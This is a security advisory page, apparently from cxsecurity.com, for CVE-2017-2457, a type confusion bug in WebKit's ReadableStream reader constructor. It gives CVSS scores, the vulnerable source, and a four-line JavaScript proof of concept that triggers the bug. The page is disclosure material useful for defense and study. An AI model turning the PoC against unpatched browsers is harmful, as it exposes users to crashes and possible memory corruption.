WebKit constructJSReadableStreamDefaultReader Type Confusion

Credit: lokihardt
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

WebKit: Type confusion in constructJSReadableStreamDefaultReader CVE-2017-2457 EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader(ExecState& exec) { VM& vm = exec.vm(); auto scope = DECLARE_THROW_SCOPE(vm); JSReadableStream* stream = jsDynamicDowncast<JSReadableStream*>(exec.argument(0)); if (!stream) return throwArgumentTypeError(exec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream"); JSValue jsFunction = stream->get(&exec, Identifier::fromString(&exec, "getReader")); <<--- 1 CallData callData; CallType callType = getCallData(jsFunction, callData); MarkedArgumentBuffer noArguments; return JSValue::encode(call(&exec, jsFunction, callType, callData, stream, noArguments)); } It doesn't check whether |getReader| is callable or not. PoC: let rs = new ReadableStream(); let cons = rs.getReader().constructor; rs.getReader = 0x12345; new cons(rs); Tested on Webkit Nightly 10.0.2(12602., <a href="https://crrev.com/210800" title="" class="" rel="nofollow">r210800</a>) This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. Found by: lokihardt

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com


Back to Top